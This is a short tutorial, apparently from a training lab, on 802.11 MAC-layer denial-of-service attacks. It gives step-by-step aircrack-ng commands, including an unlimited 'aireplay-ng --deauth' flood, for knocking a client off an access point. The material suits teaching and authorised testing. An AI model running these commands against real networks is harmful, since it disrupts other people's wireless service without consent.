Wireless DOS Attacks

Download

Today wireless networks are in great demand everywhere because they fulfill the need of hour i.e. mobility, easy deployability, easy troubleshooting and wireless networks are also cost effective then wired networks.

But it is rightly said that there are only few thing that do not have two faces and same happens with wireless networks, there are various disadvantages of wireless network along with its advantages. Wireless networks are less secure then wired networks. Wireless networks are highly vulnerable to DOS (Denial of Service) attacks.

DOS attacks are nightmare for the organization. This attack can be resulting from degradation in performance of wireless network to a complete loss of availability of network. But still many organizations overlook the potential impact of a DOS attack against their wireless network.

Although IEEE 802.11i provides an improvement in security using WPA/WPA2 security protocol instead of WEP which is very insecure security implementation for wireless network but 802.11i only provide security to data frames not the management frames. These management frames can leads to a mac layer DOS attack in a wireless network.

A DOS attack can target many different layers of OSI model but here we are mainly focusing on DATA LINK layer or mac layer.

Unencrypted management frame can disclose many important information about a wireless network like its BSSID, client associated etc. An attacker can easily carry out a mac layer DOS attack using spoofed mac address of access point. The receiver of these frames has no way to find out whether these frames are legitimate or not.

Two types of mac layer DOS attacks are

1. Authentication/Association Flood Attack
2. Deauthentication/disassociation Flood Attack.

• Authentication/Association Flood Attack

Authentication/Association Flood Attack

During the authentication/association flood attack, an attacker uses spoofed source MAC addresses that attempt to authenticate and associate to a target access point. The attacker repeatedly makes authentication/association requests, eventually exhausting the memory and processing capacity of the access point leaving clients with little or no connection to the wireless network.

• Deauthentication/Disassociation Flood Attack

In a deauthentication/disassociation flood attack, an attacker transmits spoofed frames with the source address of the access point. When the recipient receives the frames, they will disconnect from the network and attempt to reconnect.

Deauthentication/Disassociation Flood Attack

To carry out the attack following checks need to be done

1. A wireless adapter
2. Aircrack-ng suite(windows/linux)

Steps:

• Step 1: Check the name of wireless adapter with the one of the following command

iwconfig

airmon-ng

• Step 2: Scan the surrounding for available wireless networks with command:

"iwlist wlan0 scan"

The output will disclose important information like "essid(name of wireless network), bssid(mac address of AP), security implementation, channel number etc."

• Step 3: Put the wireless interface in monitor mode with the command

"airmon-ng start <interface_name> [channel_no]"

(Note: Channel No is optional, it is used as a filter to run monitor mode on a specific channel. By default monitor mode run  randomly on all channels.)

• Step 4: For getting information about client associated with access point run command

"airodump-ng --bssid <mac_address of Access point> --channel <channel no> <interfaces>"

After running the above command u will get output like this:

From here we can locate the MAC address of client associated with the access point.This is useful when we are running a targeted attack towards a client.

• Step 5: Use Aireplay-ng to send fake deauthentication on the behalf of access point to the client

Command description:

"aireplay-ng --deauth 0 -a 90:94:E4:F0:93:E5 -c 68:94:23:2B:98:A3 mon0"

--deauth sends deauthentication packet

0 means no the number of packets. (0 means unlimited or continuous sending of packet ,it can be any number.)

-a is the MAC address of Access Point.

-c is the MAC address of client or station associated with Access Point.

• Step 6: Checking effect of attack

When we launch the attack the client attached (with mac address "68:94:23:2B:98:A3" ) with Access Point loss its connectivity with AP and continuously attempt to connect with AP, but the process keeps on failing until we stop the attack. Following are the figure of client before and after the launching the attack.

----

@NetwaxLab